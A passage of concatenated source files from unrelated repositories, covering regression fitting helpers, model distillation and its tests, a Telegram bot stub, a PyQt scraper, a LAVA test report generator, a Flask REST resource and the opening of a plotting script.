S = np.array(posterior[1])[0][0]
# ^ Scatter chain (only intrinsic scatter for the moment!)
# Prepare lrgs fit chains
intercept = B[0][0]
slope = B[1][0]
sigma = np.sqrt(S)
# Return fit parameters consistently with run_linmix
return (intercept, slope, sigma)
def run_linmix(x, y, err_x, err_y, Nmin=5000, Nmax=10000, vb=True):
# pylint: disable = too-many-arguments
    '''
    Runs the Kelly regression algorithm through the package linmix.

    For convenience, here are the linmix arguments:
Linmix Args:
x(array_like): The observed independent variable.
y(array_like): The observed dependent variable.
xsig(array_like): 1-sigma measurement errors in x.
ysig(array_like): 1-sigma measurement errors in y.
xycov(array_like): Covariance between the measurement errors in x
and y.
delta(array_like): Array indicating whether a data point is
censored (i.e., not detected), or not.
If delta[i] == 1, then the ith source is
detected. If delta[i] == 0, then the ith source
is not detected and y[i] will be interpreted as
an upper limit. Note that if there are censored
data points, then the maximum-likelihood
estimate (alpha, beta, sigsqr) is not valid. By
default, all data points are assumed to be
detected.
K(int): The number of Gaussians to use in the mixture model
for the distribution of xi.
nchains(int): The number of Monte Carlo Markov Chains to
instantiate.
'''
# Make sure dimensions are correct
assert np.size(x) == np.size(y)
assert np.size(err_x) == np.size(err_y)
assert np.size(x) == np.size(err_x)
L = np.size(x)
# FIX: Implement censored data!
# Run linmix MCMC
delta = np.ones(L)
xycov = np.zeros(L)
    model = linmix.LinMix(x, y, err_x, err_y, xycov, delta, 2, 2)  # K=2, nchains=2
model.run_mcmc(Nmin, Nmax, silent=vb)
# return intercept, slope, intrinsic scatter
intercept = model.chain['alpha']
slope = model.chain['beta']
sigma = np.sqrt(model.chain['sigsqr'])
# Return fit parameters consistently with run_lrgs
return (intercept, slope, sigma)
def check_convergence(_intercept, _slope, _sigma):
'''
FIX: In future, should implement a function that checks the convergence of
the MCMC using autocorrelation, etc. and display plots/statistics.
'''
pass
```
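A quick synthetic-data sketch of `run_linmix()`; the true slope and intercept here are arbitrary, and the returned values are full MCMC chains, so they are summarized with means:

```python
import numpy as np

rng = np.random.default_rng(0)
x = rng.uniform(0.0, 1.0, 50)
y = 0.5 + 2.0 * x + rng.normal(0.0, 0.1, 50)
err_x = np.full(50, 0.05)
err_y = np.full(50, 0.05)

intercept, slope, sigma = run_linmix(x, y, err_x, err_y)
print(intercept.mean(), slope.mean(), sigma.mean())  # ~0.5, ~2.0, small
```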
{
"source": "jjog22/interpret-community",
"score": 2
}
#### File: interpret_community/mimic/model_distill.py
```python
import numpy as np
from scipy.sparse import issparse, isspmatrix_csr, vstack as sparse_vstack
def _soft_logit(values, clip_val=5):
"""Compute a soft logit on an iterable by bounding outputs to a min/max value.
:param values: Iterable of numeric values to logit and clip.
:type values: iter
:param clip_val: Clipping threshold for logit output.
:type clip_val: Union[Int, Float]
"""
new_values = np.log(values / (1 - values))
return np.clip(new_values, -clip_val, clip_val)
def _model_distill(teacher_model_predict_fn, uninitialized_surrogate_model, data, original_training_data,
explainable_model_args):
"""Teach a surrogate model to mimic a teacher model.
:param teacher_model_predict_fn: Blackbox model's prediction function.
:type teacher_model_predict_fn: function
:param uninitialized_surrogate_model: Uninitialized model used to distill blackbox.
:type uninitialized_surrogate_model: uninitialized model
:param data: Representative data (or training data) to train distilled model.
:type data: numpy.ndarray
:param original_training_data: Representative data (or training data) to get predictions from teacher model.
:type original_training_data: numpy.ndarray
:param explainable_model_args: An optional map of arguments to pass to the explainable model
for initialization.
:type explainable_model_args: dict
"""
# For regression, teacher_y is a real value whereas for classification it is a probability between 0 and 1
teacher_y = teacher_model_predict_fn(original_training_data)
multiclass = False
training_labels = None
is_classifier = len(teacher_y.shape) == 2
# If the predict_proba function returned one column but this is a classifier, modify to [1-p, p]
if is_classifier and teacher_y.shape[1] == 1:
teacher_y = np.column_stack((1 - teacher_y, teacher_y))
if is_classifier and teacher_y.shape[1] > 2:
# If more than two classes, use multiclass surrogate
multiclass = True
# For multiclass case, we need to train on the class label
training_labels = np.argmax(teacher_y, axis=1)
unique_labels = set(np.unique(training_labels))
if len(unique_labels) < teacher_y.shape[1]:
# Get the missing labels
missing_labels = set(range(teacher_y.shape[1])).difference(unique_labels)
# Append some rows with the missing labels
for missing_label in missing_labels:
# Find max prob for missing label
max_row_index = np.argmax(teacher_y[:, missing_label])
# Append the extra label to data and y value
training_labels = np.append(training_labels, missing_label)
if issparse(data) and not isspmatrix_csr(data):
data = data.tocsr()
vstack = sparse_vstack if issparse(data) else np.vstack
data = vstack([data, data[max_row_index:max_row_index + 1, :]])
surrogate_model = uninitialized_surrogate_model(multiclass=multiclass,
**explainable_model_args)
else:
surrogate_model = uninitialized_surrogate_model(**explainable_model_args)
if is_classifier and teacher_y.shape[1] == 2:
# Make sure output has only 1 dimension
teacher_y = teacher_y[:, 1]
# Transform to logit space and fit regression
surrogate_model.fit(data, _soft_logit(teacher_y))
else:
# Use hard labels for regression or multiclass case
if training_labels is None:
training_labels = teacher_y
surrogate_model.fit(data, training_labels)
return surrogate_model
```
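A hedged usage sketch of `_model_distill()` with scikit-learn; `SimpleSurrogate` is a hypothetical stand-in for the package's explainable-model wrappers (it only needs a `multiclass` kwarg and a `fit` method, as assumed by the code above):

```python
import numpy as np
from sklearn.linear_model import LinearRegression, LogisticRegression

class SimpleSurrogate:
    """Hypothetical minimal surrogate: a linear model in logit space."""
    def __init__(self, multiclass=False):
        self.model = LinearRegression()
    def fit(self, data, labels):
        self.model.fit(data, labels)

X = np.random.rand(200, 4)
y = (X[:, 0] + X[:, 1] > 1.0).astype(int)
teacher = LogisticRegression().fit(X, y)

# Binary case: the teacher's probabilities are soft-logit-transformed
# and the surrogate is fit as a regression on them.
surrogate = _model_distill(teacher.predict_proba, SimpleSurrogate, X, X, {})
```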
#### File: test/raw_explain/test_data_mapper.py
```python
import numpy as np
import pytest
from scipy.sparse import issparse, csr_matrix
from sklearn.compose import ColumnTransformer
from sklearn.impute import SimpleImputer
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import OneHotEncoder
from interpret_community._internal.raw_explain import DataMapper
from raw_explain.utils import FuncTransformer, IdentityTransformer, SparseTransformer
from constants import owner_email_tools_and_ux
@pytest.mark.owner(email=owner_email_tools_and_ux)
@pytest.mark.usefixtures('clean_dir')
class TestDataMapper:
def setup_class(self):
self._identity_mapper_list = DataMapper([([0], IdentityTransformer()), ([1], IdentityTransformer())])
column_transformer = ColumnTransformer(
[("column1", IdentityTransformer(), [0]), ("column2", IdentityTransformer(), [1])]
)
x = np.ones((10, 5))
column_transformer.fit(x)
self._identity_mapper_column_transformer = DataMapper(column_transformer)
def _transform_numpy(self, dmapper):
x = np.ones((10, 5))
result = dmapper.transform(x)
assert result.shape == (10, 2)
def test_mixed_dtypes(self):
x = np.ones((10, 2))
data_mapper = DataMapper([([0], IdentityTransformer()), ([1], SparseTransformer())])
result = data_mapper.transform(x)
assert issparse(result)
def test_transform_sparse(self):
x = csr_matrix(np.zeros((10, 2)))
result = self._identity_mapper_list.transform(x)
assert result.shape == x.shape
assert issparse(result)
def test_column_with_brackets(self):
x = np.ones((2, 3))
x[0, 0] = 0
encoder = OneHotEncoder()
encoder.fit(x[0].reshape(-1, 1))
data_mapper = DataMapper([([0], encoder)])
result = data_mapper.transform(x)
assert result.shape == (2, 2)
def test_transform_numpy_list(self):
self._transform_numpy(self._identity_mapper_list)
def test_transform_numpy_column_transformer(self):
self._transform_numpy(self._identity_mapper_column_transformer)
def test_column_without_brackets(self):
data_mapper = DataMapper([(0, FuncTransformer(lambda x: x.reshape(-1, 1)))])
result = data_mapper.transform(np.ones((2, 3)))
assert np.all(result == [1, 1])
def test_column_with_none_transformer(self):
x = np.ones((2, 3))
data_mapper = DataMapper([(0, None)])
result = data_mapper.transform(x)
assert np.all(result == np.array([[1, 1]]))
def test_column_passthrough_column_transformer(self):
x = np.ones((2, 3))
column_transformer = ColumnTransformer([
("column0", "passthrough", [0])
])
column_transformer.fit(x)
data_mapper = DataMapper(column_transformer)
result = data_mapper.transform(x)
assert np.all(result == np.array([[1, 1]]))
def test_column_exception_without_brackets(self):
with pytest.raises(ValueError):
x = np.ones((2, 3))
x[0, 0] = 0
encoder = OneHotEncoder()
encoder.fit(x[0])
data_mapper = DataMapper([[0], encoder])
data_mapper.transform(x)
def test_pipeline_transform_list(self):
pipeline = Pipeline([("imputer", SimpleImputer()), ("onehotencoder", OneHotEncoder())])
x = np.ones((3, 2))
pipeline.fit(x)
data_mapper = DataMapper([([0, 1], pipeline)])
result = data_mapper.transform(x)
assert result.shape == (3, 2)
def test_pipeline_transform_column_transformer(self):
pipeline = Pipeline([("imputer", SimpleImputer()), ("onehotencoder", OneHotEncoder())])
x = np.ones((3, 2))
column_transformer = ColumnTransformer([
("column", pipeline, [0, 1])
])
column_transformer.fit(x)
data_mapper = DataMapper(column_transformer)
result = data_mapper.transform(x)
assert result.shape == (3, 2)
def test_many_to_many_exception_list(self):
# A transformer that takes input many columns. Since we do not recognize this transformer and it uses
# many input columns - it is treated as many to many/one map.
with pytest.raises(ValueError):
DataMapper([([0, 1], IdentityTransformer())])
def test_many_to_many_exception_column_transformer(self):
# A transformer that takes input many columns. Since we do not recognize this transformer and it uses
# many input columns - it is treated as many to many/one map.
with pytest.raises(ValueError):
column_transformer = ColumnTransformer([
("column_0_1", IdentityTransformer(), [0, 1])
])
x = np.ones((2, 2))
column_transformer.fit(x)
DataMapper(column_transformer)
def test_many_to_many_support_transformations(self):
# Instantiate data mapper with many to many transformer support and test whether the feature map is generated
column_transformer = ColumnTransformer([
("column_0_1_2_3", IdentityTransformer(), [0, 1, 2, 3]),
("column_4_5", OneHotEncoder(), [4, 5])
])
x = np.ones((10, 6))
# so that one hot encoder doesn't complain of only one category
x[0, 4] = 0
x[0, 5] = 0
column_transformer.fit(x)
data_mapper = DataMapper(column_transformer, allow_all_transformations=True)
data_mapper.transform(x)
# check feature mapper contents
feature_map_indices = [
[0, 1, 2, 3],
[0, 1, 2, 3],
[0, 1, 2, 3],
[0, 1, 2, 3],
[4, 5],
[6, 7]
]
x_out = column_transformer.transform(x)
feature_map = np.zeros((x.shape[1], x_out.shape[1]))
num_rows = 0
for i, row in enumerate(feature_map_indices[:4]):
feature_map[i, row] = 0.25
num_rows += 1
for i, row in enumerate(feature_map_indices[4:], start=num_rows):
feature_map[i, row] = 1.0
assert (data_mapper.feature_map == feature_map).all()
```
{
"source": "jjohn114/red",
"score": 2
}
#### File: jjohn114/red/bot.py
```python
from configs import Config
from pyrogram import Client, filters
app = Client(
api_id = Config.API_ID,
api_hash = Config.API_HASH,
bot_token = Config.BOT_TOKEN,
session_name = Config.SESSION_NAME
)
@app.on_message(filters.command("start"))
def start(app,msg):
app.send_message(msg.chat.id, "hello there")
@app.on_message(filters.command("help"))
def help(app,msg):
app.send_message(msg.chat.id, "How may i help you")
app.run() # Automatically start() and idle()
```
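For context, `configs.Config` is assumed to expose the four attributes read above; a hypothetical shape:

```python
# configs.py (all values hypothetical placeholders)
class Config:
    API_ID = 12345
    API_HASH = "abcdef0123456789"
    BOT_TOKEN = "123456:bot-token-here"
    SESSION_NAME = "red_bot"
```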
{
"source": "jjohn50/Python3-by-practice",
"score": 3
}
#### File: 03 Regex/Parser using NLP/Web_scraping_Dynamic_Javascript_Scraping_DOES_NOT_WORK.py
```python
import sys
# Qt applications receive command-line arguments via sys.argv
from PyQt5.QtWidgets import QApplication
from PyQt5.QtCore import QUrl
from PyQt5.QtWebEngineWidgets import QWebEnginePage
import bs4 as bs
class Client(QWebEnginePage):
    def __init__(self, url):
        self.app = QApplication(sys.argv)
        # starting the application
        QWebEnginePage.__init__(self)
        self.html = None
        # connecting method for when the page load is finished
        self.loadFinished.connect(self.on_page_load)
        self.load(QUrl(url))
        self.app.exec_()
    def on_page_load(self):
        # QWebEnginePage.toHtml() is asynchronous: it hands the HTML
        # to a callback instead of returning it
        self.toHtml(self._store_html)
    def _store_html(self, html):
        self.html = html
        # just want it to load and nothing else
        self.app.quit()
url = 'https://pythonprogramming.net/parsememcparseface/'
client_response = Client(url)
source = client_response.html
# the rendered page HTML, captured by the callback above
soup = bs.BeautifulSoup(source, 'lxml')
js_test = soup.find('p', class_='jstest')
# find the paragraph tag whose class is 'jstest'
print(js_test.text)
# prints the paragraph's (JavaScript-rendered) text
# Sometimes parsing a table yields no data: the content is injected by
# JavaScript, so a plain HTTP client never receives it.
# Requires: pip3 install PyQt5 (and PyQtWebEngine on newer PyQt5 releases)
# The original tutorial used QWebPage, which was removed from PyQt5;
# QWebEnginePage with an asynchronous toHtml() callback is used here instead.
```
{
"source": "jjohnson-arm/mbl-tools",
"score": 2
}
#### File: reports/lava/daily_report.py
```python
import lavaResultExtract as lRE
import sys
from os import environ
import argparse
from datetime import datetime
HELP_TEXT = """Lava daily report generator.
Requires the following environment variables to be set:
LAVA_SERVER - hostname of the server
LAVA_USER - username of login to server
LAVA_TOKEN - token used by username to login to server
REPORT_LINK - URL of Lava report generation script
"""
HTML_HEADER = """
<head>
<style>
body { background-color: black; }
table, th, td {
border:1px solid #669999;
border-collapse: collapse;
font-size: 1.3vw; /* Default size (jobs/tests) */
font-family: Arial, Helvetica, sans-serif;
font-weight: bold;
padding:5px;
border-bottom:3px solid #669999;
background-color:#f2f2f2;
}
table { min-width: 100%; }
th { color:#353531; }
.backamber { background-color:#cc7a00; color:#fff; }
.backred { background-color:#8b0000; color:#fff; }
.backgreen { background-color:#006400; color:#fff; }
.backgrey { background-color:#808080; color:#fff; }
.textbuild { font-size: 2vw; } /* Build job header size */
.textboard { font-size: 0.9vw; } /* Board results size */
.texttime { float: right; font-size: 0.8vw; color:#fff }
.textkey { background-color:#000; color:#fff; font-size: 0.9vw; }
.textred { color: #e60000; text-align: right; }
.textamber { color: #e68a00; text-align: right; }
.textgreen { color: #009900; text-align: right; }
.textblack { color: #353531; text-align: right; }
.row { display: flex; }
.column { flex: 50%; }
a:link { text-decoration: none; color:#fff; }
a:visited { text-decoration: none; color:#fff; }
a:hover { text-decoration: underline; }
a:active { text-decoration: underline; }
</style>
</head>
<body>
"""
HTML_FOOTER = """
</body>
"""
MAX_RESULTS = 100
def get_relative_time(timestamp):
"""Given a timestamp string, get a relative time.
:return: Human readable relative time.
"""
dt = datetime.strptime(timestamp, "%Y%m%dT%H:%M:%S")
delta = datetime.now() - dt
days = delta.days
relative = ""
if days != 0:
relative = "{} day{} ago".format(days, ("" if days == 1 else "s"))
else:
mins = int(delta.seconds / 60)
if mins < 100:
relative = "{} min{} ago".format(mins, ("" if mins == 1 else "s"))
else:
hours = int(delta.seconds / 3600)
relative = "{} hour{} ago".format(
hours, ("" if hours == 1 else "s")
)
return relative
def get_results_summary(server, submitter, build_name, build_num=-1):
"""Get a summary of the jobs/tests for a build.
:return: Summary dictionary
"""
# Get test jobs for the given jenkins build_name
query = lRE.get_custom_query(
server, submitter, "{}_build{}".format(build_name, build_num)
)
results = server.results.make_custom_query("testjob", query, MAX_RESULTS)
build_num = query[query.rfind("build") + 5 :]
if len(results) > 0:
time = get_relative_time(results[0]["submit_time"].value)
else:
time = "never"
summary = {
"Name": build_name,
"Build": build_num,
"Totals": {},
"Boards": {},
"Time": time,
}
summary["Totals"] = {
"Jobs": len(results),
"Complete": 0,
"Pending": 0,
"Incomplete": 0,
"Suites": 0,
"Failed": 0,
"Passed": 0,
}
for result in results:
board = result["requested_device_type_id"]
if board not in summary["Boards"]:
summary["Boards"][board] = {
"Jobs": 0,
"Complete": 0,
"Pending": 0,
"Incomplete": 0,
"Suites": 0,
"Failed": 0,
"Passed": 0,
}
details = server.scheduler.job_details(result["id"])
if details["status"] == "Complete":
summary["Boards"][board]["Complete"] += 1
summary["Totals"]["Complete"] += 1
elif details["status"] in ["Incomplete", "Canceled"]:
summary["Boards"][board]["Incomplete"] += 1
summary["Totals"]["Incomplete"] += 1
else:
summary["Boards"][board]["Pending"] += 1
summary["Totals"]["Pending"] += 1
summary["Boards"][board]["Jobs"] += 1
suites = lRE.get_testjob_suites_list(server, result["id"])
for suite in suites:
numberOfTests = 0
numberOfPasses = 0
numberOfFails = 0
numberOfSkips = 0
if suite["name"] != "lava":
summary["Boards"][board]["Suites"] += 1
summary["Totals"]["Suites"] += 1
test_results = lRE.get_testsuite_results(
server, result["id"], suite["name"]
)
for item in test_results:
numberOfTests += 1
if item["result"] == "pass":
numberOfPasses += 1
elif item["result"] == "skip":
numberOfSkips += 1
elif item["result"] == "fail":
numberOfFails += 1
summary["Totals"]["Failed"] += numberOfFails
summary["Totals"]["Passed"] += numberOfPasses
summary["Boards"][board]["Failed"] += numberOfFails
summary["Boards"][board]["Passed"] += numberOfPasses
return summary
# List of indicators based for jobs, tests and overall
# Format for each list entry is:
# [{"Type": threshold ...}, [positive sym, negative sym, desc]]
INDICATORS = [
[{"Jobs": 0, "Tests": 0, "All": 0}, ["equals", "equals", "Same"]],
[{"Jobs": 1, "Tests": 2, "All": 5}, ["#8673", "#8675", "Trivial"]],
[{"Jobs": 3, "Tests": 5, "All": 10}, ["uArr", "dArr", "Minor"]],
[{"Jobs": 7, "Tests": 10, "All": 20}, ["#10506", "#10507", "Major"]],
[{"Jobs": 0, "Tests": 0, "All": 0}, ["#10224", "#10225", "Serious"]],
]
def get_indicator(value, last, prev):
"""Return an indicator of much different the last and prev results are.
:return: HTML symbol to indicate how much difference.
"""
if value in ["Complete", "Incomplete"]:
ind_type = "Jobs"
elif value in ["Passed", "Failed"]:
ind_type = "Tests"
else:
ind_type = "All"
diff = abs(last - prev)
index = 0 if last > prev else 1
for group in INDICATORS:
threshold = group[0][ind_type]
indicator = group[1][index]
if threshold >= diff:
break
# Return the last one found
return "&{};".format(indicator)
def indicator_key_table():
"""Print out a simple key table of indicators."""
print("<table><tr>")
for group in INDICATORS:
print(
'<td class="textkey">&{}; {}</td>'.format(group[1][0], group[1][2])
)
print("</tr></table>")
def compare_runs(runs, value, board=None):
"""Compare a value between runs and return indication of better/worse.
:return: HTML symbol to indicate status.
"""
if "Previous" in runs:
if board:
last = runs["Last"]["Boards"][board][value]
if board in runs["Previous"]["Boards"]:
prev = runs["Previous"]["Boards"][board][value]
else:
# Can't compare as board didn't get run last time
return ""
else:
last = runs["Last"]["Totals"][value]
prev = runs["Previous"]["Totals"][value]
return "{} ".format(get_indicator(value, last, prev))
else:
return ""
def choose_class(result, zero_class, nonz_class):
"""Return one of the classes based on the result.
:return: zero_class when zero result, else nonz_class
"""
if result == 0:
return zero_class
else:
return nonz_class
def get_result_class_and_string(runs, value, board=None):
"""Get a class based on value & the result with comparison indicator.
:return: Tuple of class - zero_class when zero result, else nonz_class,
and String with status indicator for HTML.
"""
if board:
result = runs["Last"]["Boards"][board][value]
else:
result = runs["Last"]["Totals"][value]
if value in ["Complete", "Passed"]:
clss = choose_class(result, "textblack", "textgreen")
elif value in ["Incomplete", "Failed"]:
clss = choose_class(result, "textblack", "textred")
else:
clss = "textamber"
result = "{}{}".format(compare_runs(runs, value, board), result)
return (clss, result)
# How much complete/incomplete jobs are worth compared to passed/failed tests
JOBS_FACTOR = 5
def calculate_overall(totals):
"""Get an overall value from a dictionary of run totals.
:return: Overall value.
"""
result = totals["Complete"] - totals["Incomplete"]
result *= JOBS_FACTOR
result += totals["Passed"] - totals["Failed"]
return result
def get_result_overall_class_and_string(runs):
"""Get a class based on value & the result with comparison indicator.
:return: Tuple of class and String with status indicator for HTML.
"""
totals = runs["Last"]["Totals"]
if "Previous" in runs:
last = calculate_overall(totals)
prev = calculate_overall(runs["Previous"]["Totals"])
indicator = " {}".format(get_indicator("All", last, prev))
else:
last = 0
prev = 0
indicator = ""
if totals["Jobs"] > 0:
if totals["Incomplete"] == 0 and totals["Failed"] == 0:
# Complete success!
backclass = "backgreen"
elif last < prev:
# Things are getting worse!
backclass = "backred"
else:
# Still some problems, but probably getting better.
backclass = "backamber"
else:
# Nothing ran
backclass = "backgrey"
return (backclass, indicator)
def html_output(results, link, submitter):
"""Print out all the summary results in HTML tables."""
print(HTML_HEADER)
print('<div class="row">')
half = int((len(results) + 1) / 2)
count = 0
print('<div class="column">')
for runs in results:
result = runs["Last"]
# Put half the jobs in one column and the others in another
if count == half:
print("</div>") # Finish the col
print('<div class="column">')
count += 1
# Work out the heading colour based on results
(backclass, indicator) = get_result_overall_class_and_string(runs)
# Quick link to the detailed results
anchor = "{}?image_version={}&image_number={}&submitter={}".format(
link, result["Name"], result["Build"], submitter
)
# Start the table with a main job name heading
print("<table><tr>")
header = '<span class="textbuild"><a href="{}">{} build{}</a></span>'.format( # noqa: E501
anchor, result["Name"], result["Build"]
)
header = '{}{}<span class="texttime">{}</span>'.format(
header, indicator, result["Time"]
)
print('<th class="{}" colspan="5">{}</th>'.format(backclass, header))
print("</tr><tr>")
# Indicate there are still jobs pending
if result["Totals"]["Pending"] > 0:
print("<th>Jobs (pending)</th>")
span = "1"
else:
if (
"Previous" in runs
and runs["Previous"]["Totals"]["Pending"] > 0
):
print("<th>Jobs (previous pends)</th>")
span = "1"
else:
print("<th>Jobs</th>")
span = "2"
if span == "1":
print(
'<td class="{}">{}</td>'.format(
*get_result_class_and_string(runs, "Pending")
)
)
# Overall job stats
print(
'<td colspan="{}" class="{}">{}</td>'.format(
span, *get_result_class_and_string(runs, "Complete")
)
)
print(
'<td colspan="2" class="{}">{}</td>'.format(
*get_result_class_and_string(runs, "Incomplete")
)
)
print("</tr><tr>")
# Overall test stats
print("<th>Tests</th>")
print(
'<td colspan="2" class="{}">{}</td>'.format(
*get_result_class_and_string(runs, "Passed")
)
)
print(
'<td colspan="2" class="{}">{}</td>'.format(
*get_result_class_and_string(runs, "Failed")
)
)
# Per board stats
for board, info in result["Boards"].items():
print("</tr><tr>")
print('<th class="textboard">{} (jobs/tests)</th>'.format(board))
print(
'<td class="textboard {}">{}</td>'.format(
*get_result_class_and_string(runs, "Complete", board)
)
)
print(
'<td class="textboard {}">{}</td>'.format(
*get_result_class_and_string(runs, "Incomplete", board)
)
)
print(
'<td class="textboard {}">{}</td>'.format(
*get_result_class_and_string(runs, "Passed", board)
)
)
print(
'<td class="textboard {}">{}</td>'.format(
*get_result_class_and_string(runs, "Failed", board)
)
)
print("</tr></table>")
indicator_key_table()
print("</div>") # Finish the col
print("</div>") # Finish the row
print(HTML_FOOTER)
def main():
"""Create the daily report."""
parser = argparse.ArgumentParser(
description=HELP_TEXT, formatter_class=argparse.RawTextHelpFormatter
)
parser.add_argument(
"--submitter",
type=str,
default="mbl",
nargs=None,
help="Submitter (default: mbl)",
)
parser.add_argument(
"build_name", nargs="+", help="List of build names from jenkins"
)
args = parser.parse_args()
try:
server = lRE.connect_to_server(
environ["LAVA_SERVER"], environ["LAVA_USER"], environ["LAVA_TOKEN"]
)
link = environ["REPORT_LINK"]
except KeyError as key:
print("ERROR: unset environment variable - {}".format(key))
        sys.exit(2)
results = []
for build in args.build_name:
runs = {}
runs["Last"] = get_results_summary(server, args.submitter, build)
if runs["Last"]["Build"]:
build_num = int(runs["Last"]["Build"]) - 1
if build_num > 0:
runs["Previous"] = get_results_summary(
server, args.submitter, build, build_num
)
results.append(runs)
html_output(results, link, args.submitter)
if __name__ == "__main__":
sys.exit(main())
```
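A hypothetical invocation, matching the environment variables listed in `HELP_TEXT` and the positional build names (all values are placeholders):

```python
# export LAVA_SERVER=lava.example.com
# export LAVA_USER=reporter
# export LAVA_TOKEN=<token>
# export REPORT_LINK=https://example.com/lava-report
# python daily_report.py --submitter mbl nightly-imx7 nightly-rpi3 > report.html
```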
{
"source": "jjojala/results",
"score": 2
}
#### File: server/rest/community.py
```python
from flask import request
from flask_restful import Resource, reqparse
from .notification import CREATED, UPDATED, PATCHED, REMOVED
import rest.timeservice as timeservice
from util.patch import patch, PatchConflict
communities = [
]
_NOTIFICATION_ARG = "notifications"
_API_ARG = "api"
_TYPE = "Community"
class Communities(Resource):
    @staticmethod
    def makeArgs(notifications, api):
return {
_NOTIFICATION_ARG: notifications,
_API_ARG: api }
def __init__(self, **kwargs):
self._notifications = kwargs[_NOTIFICATION_ARG]
self._api = kwargs[_API_ARG]
@timeservice.time_service
def get(self):
return communities, 200
class Community(Resource):
    @staticmethod
    def makeArgs(notifications, api):
return {
_NOTIFICATION_ARG: notifications,
_API_ARG: api }
def __init__(self, **kwargs):
self._notifications = kwargs[_NOTIFICATION_ARG]
self._api = kwargs[_API_ARG]
@timeservice.time_service
def get(self, id):
for i in communities:
if (id == i["id"]):
return i, 200
return "{} with id {} not found".format(_TYPE, id), 404
@timeservice.time_service
def post(self, id):
parser = reqparse.RequestParser()
parser.add_argument("name")
parser.add_argument("abbr")
args = parser.parse_args()
for i in communities:
if (id == i["id"]):
return "{} with id {} already exists".format(
_TYPE, id), 409
community = {
"id": id,
"name": args["name"],
"abbr": args["abbr"]
}
communities.append(community)
self._notifications.submit(CREATED, _TYPE, community)
return community, 201, { 'Location': self._api + id }
@timeservice.time_service
def put(self, id):
parser = reqparse.RequestParser()
parser.add_argument("name")
parser.add_argument("abbr")
args = parser.parse_args()
for i in communities:
if (id == i["id"]):
i["name"] = args["name"]
i["abbr"] = args["abbr"]
self._notifications.submit(UPDATED, _TYPE, i)
return i, 200
return "{} with id {} not found".format(_TYPE, id), 404
@timeservice.time_service
def delete(self, id):
global communities
new = [i for i in communities if i["id"] != id]
if (len(new) < len(communities)):
communities = new
self._notifications.submit(REMOVED, _TYPE, id)
return "{} is deleted.".format(id), 200
return "{} with id {} not found".format(_TYPE, id), 404
@timeservice.time_service
def patch(self, id):
diff = request.json
# TODO: explicitly lock the item
for i in communities:
if (id == i["id"]):
try:
patched = patch(i, diff)
i["name"] = patched["name"]
i["abbr"] = patched["abbr"]
self._notifications.submit(PATCHED, _TYPE, diff)
return i, 200
except PatchConflict as ex:
return "Patching {} with id {} failed: {}".format(
_TYPE, id, str(ex)), 409
return "{} with id {} not found".format(_TYPE, id), 404
```
#### File: server/rest/notification.py
```python
from flask_socketio import SocketIO, Namespace
CREATED = 'CREATED'
UPDATED = 'UPDATED'
PATCHED = 'PATCHED'
REMOVED = 'REMOVED'
class Notifications(Namespace):
def __init__(self, namespace, socketio):
super(Notifications, self).__init__(namespace)
self._socketio = socketio
def submit(self, event, entity, data):
notification = {
'event': event + ' ' + entity,
'data': data
}
self._socketio.emit('notification', notification, namespace='/api/notifications')
def on_connect(self):
print("on_connect()")
def on_disconnect(self):
print("on_disconnect()")
def on_notification(self, data):
print("on_notification(data={})".format(data))
```
#### File: server/util/patch.py
```python
import copy
class PatchConflict(Exception):
def __init__(self, key, expected, actual):
self._msg = "Conflict in attribute \'{}\': expecting \'{}\' but got \'{}\'".format(key, expected, actual)
def __str__(self):
return self._msg
def diff(a, b):
"""Get a diff -object of 'a' to 'b'
Given, the a and b..
a = { "id": 1, name:"<NAME>", args: [ 1, 2 ] }
b = { "id": 2, name:"<NAME>", args: [ 2, 3 ] }
.. the diff is:
diff(a, b) = {
"name": [ "<NAME>", "<NAME>" ],
"args": [ [ 1, 2 ], [ 2, 3 ] ]
}
If the two objects have no difference, then an empty
object "{}" will be returned.
"""
def diff_value(value_a, value_b):
if (value_a == value_b):
return None
if (value_a == None or value_b == None):
return [value_a, value_b]
if (isinstance(value_a, dict)):
return diff_dict(value_a, value_b)
return [value_a, value_b]
    def diff_dict(dict_a, dict_b):
        d = {}
        for key, val in dict_a.items():
            c = diff(val, dict_b[key])
            # skip equal values (None) and empty sub-diffs ({})
            if c:
                d[key] = c
        return d
if (isinstance(a, dict)):
return diff_dict(a, b)
return diff_value(a, b)
def patch(target, diff, key=None):
"""Patch object target with diff-object and return a new, patched object.
The 'diff' must apply the rules of an diff-object briefly described
with the diff() function.
"""
def patch_value(k, t, c):
if (t == c[0]):
return c[1]
raise PatchConflict(k, c[0], t)
def patch_dict(k, t, d):
r = {} # result
for k,v in t.items(): # for 'key','value:' in 'target'
if (k in d.keys()): # if 'diff' contains 'key'
r[k] = patch(v, d[k], k)
else:
r[k] = copy.deepcopy(t[k]) # no 'change' so copy as such
return r
if (isinstance(diff, dict)):
return patch_dict(key, target, diff)
return patch_value(key, target, diff)
``` |
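A quick round-trip check of `diff()` and `patch()` as defined above; the dictionaries are made up for illustration:

```python
# Illustrative round trip (hypothetical data).
a = {"id": 1, "name": "alpha", "args": [1, 2]}
b = {"id": 1, "name": "beta", "args": [2, 3]}

d = diff(a, b)
# d == {"name": ["alpha", "beta"], "args": [[1, 2], [2, 3]]}

patched = patch(a, d)
assert patched == b

# Applying the same diff to a conflicting object raises PatchConflict:
c = {"id": 1, "name": "gamma", "args": [1, 2]}
try:
    patch(c, d)
except PatchConflict as ex:
    print(ex)  # Conflict in attribute 'name': expecting 'alpha' but got 'gamma'
```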
{
"source": "jjokella/pyshemkf",
"score": 2
} |
#### File: scripts/errorplot/plot.py
```python
from matplotlib import colors
import numpy as np
import matplotlib.pyplot as plt
from pskf.tools.run import pythonmodule as pm
from pskf.tools.plot import plotarrays as pa
from pskf.scripts.errorplot import arrays as ea
###############################################################################
# Errorplot RMSE point plot #
###############################################################################
def plot(
ax,
which_methods=[0, 1, 2, 3, 4, 5, 6],
which_res='endres',
stat_method='mean',
ensemble_sizes=[50, 70, 100, 250],
axistitle='',
model='wavebc',
is_std=False,
lineyval=0.62,
std_method='std',
pic_format='pdf',
figpos=[0.15, 0.3, 0.8, 0.6],
xlim_min=0,
xlim_max=None,
ylims=[0.28, 0.82],
is_textpos_auto=True,
textpos=[0.7, 0.6, 0.5, 0.4],
xdiff_nens=0.5,
yticks=[0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 1.1],
ylabel=r'RMSE $\log(K[\mathrm{m}^2])$',
num_pack=4, # Number of methods in pack
is_text=False,
text_x=0.5,
text_y=0.5,
n_syn=1000,
legend_input=None,
formatsos=['o', 'v', 's', 'p',
